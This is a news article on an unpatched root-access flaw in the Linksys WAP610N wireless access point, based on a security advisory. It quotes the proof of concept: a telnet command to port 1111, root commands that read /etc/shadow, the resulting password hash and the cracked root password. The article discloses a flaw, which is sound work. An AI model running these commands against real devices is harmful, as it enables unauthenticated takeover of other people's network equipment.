A popular wireless access point made by Cisco Systems’ Linksys unit has a vulnerability that enables a remote attacker to gain root access and execute arbitrary commands on the device. The bug is several months old and Linksys has not issued a patch for it yet.
The vulnerability is in the Linksys WAP610N, a dual-band wireless access point that includes support for the 802.11n standard. The problem was identified by researchers at Secure Network, an Italian security company, which said in its advisory that it notified the vendor of the problem in June 2010. Cisco acknowledged the issue at the time, but hasn’t issued a patch for the vulnerability as of yet.
The vulnerability itself allows an attacker to connect to a console on the access point without authenticating and then run system commands.
“Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user,” the advisory says. Here are the details of the bug, from Secure Networks’ advisory:
telnet <access-point IP> 1111
Command> system id
Output> uid=0(root) gid=0(root)
Coomand> system cat /etc/shadow
Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup> bin:*:10933:0:99999:7:::
Ouptup> daemon:*:10933:0:99999:7:::
Ouptup> adm:*:10933:0:99999:7:::
Ouptup> lp:*:10933:0:99999:7:::
Ouptup> sync:*:10933:0:99999:7:::
Ouptup> shutdown:*:10933:0:99999:7:::
Ouptup> halt:*:10933:0:99999:7:::
Ouptup> uucp:*:10933
root password is “wlan” (cracked with MDcrack http://mdcrack.openwall.net)
The WAP610N is designed for use in small and home offices and supports WPA encryption. However, the encryption is beside the point when this vulnerability is present, because an attacker can run commands on the device and doesn’t need to worry about trying to decrypt the traffic going to and from the access point.